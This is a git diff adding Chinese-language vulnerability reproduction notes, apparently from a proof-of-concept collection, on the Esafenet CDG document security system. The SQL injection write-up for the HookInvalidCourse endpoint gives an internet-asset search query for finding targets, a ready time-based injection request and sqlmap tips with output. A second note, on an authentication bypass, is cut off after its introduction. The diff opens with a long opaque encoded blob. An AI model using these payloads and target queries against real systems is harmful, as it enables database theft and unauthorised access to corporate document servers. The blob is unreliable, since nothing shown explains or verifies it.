GJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706605985910-7cc6e8b3-7fef-4af6-867e-71f9a595d901.png](./img/GYPuv2aIcHAg1WeP/1706605985910-7cc6e8b3-7fef-4af6-867e-71f9a595d901-569610.png)
+
+
+
+> 更新: 2024-04-20 22:01:32  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bzpz80r8mmev2733>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统HookInvalidCourse存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统HookInvalidCourse存在SQL注入漏洞.md
new file mode 100644
index 0000000..50c9f25
--- /dev/null
+++ b/亿赛通电子文档安全管理系统HookInvalidCourse存在SQL注入漏洞.md
@@ -0,0 +1,54 @@
+# 亿赛通电子文档安全管理系统HookInvalidCourse存在SQL注入漏洞
+
+# 一、漏洞简介
+ 亿赛通电子文档安全管理系统（简称：CDG）是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通部门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。亿赛通电子文档安全管理系统HookInvalidCourse存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/7gxekhf2pSLNh1iS/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-152117.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/system/HookInvalidCourse;loginService HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+
+command=DelHookInvalidCourse&id=1';WAITFOR DELAY '0:0:3'--
+```
+
+![1700640331102-534fff64-497a-4026-b8e7-f9d06ccf3ec5.png](./img/7gxekhf2pSLNh1iS/1700640331102-534fff64-497a-4026-b8e7-f9d06ccf3ec5-709855.png)
+
+sqlmap
+
+```plain
+POST /CDGServer3/system/HookInvalidCourse;loginService HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+
+command=DelHookInvalidCourse&id=1
+```
+
+注意：不能使用`--batch`参数，因响应为`404`，`sqlamp`
+
+```plain
+[CRITICAL] page not found (404)
+it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] n
+```
+
+![1700640609001-6b08c95b-d829-4fed-9d7d-2228ef7ac450.png](./img/7gxekhf2pSLNh1iS/1700640609001-6b08c95b-d829-4fed-9d7d-2228ef7ac450-411173.png)
+
+
+
+![1700640620447-993fc465-1bf0-4c9a-8198-449f65c79dfd.png](./img/7gxekhf2pSLNh1iS/1700640620447-993fc465-1bf0-4c9a-8198-449f65c79dfd-484765.png)
+
+
+
+> 更新: 2024-04-20 22:01:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uw9gw8vdvw99v8i3>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统LinkFilterService存在身份认证绕过漏洞.md b/亿赛通电子文档安全管理系统LinkFilterService存在身份认证绕过漏洞.md
new file mode 100644
index 0000000..3ed4a29
--- /dev/null
+++ b/亿赛通电子文档安全管理系统LinkFilterService存在身份认证绕过漏洞.md
@@ -0,0 +1,45 @@
+# 亿赛通电子文档安全管理系统LinkFilterService存在身份认证绕过漏洞
+
+# 一、漏洞简介
+ 亿赛通电子文档安全管理系统（简称：CDG）是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通部门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。亿赛通电子文档安全管理系统LinkFilterService存在身份认证绕过漏洞，攻击者可通过该漏洞绕过身份认证进入系统后台。
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
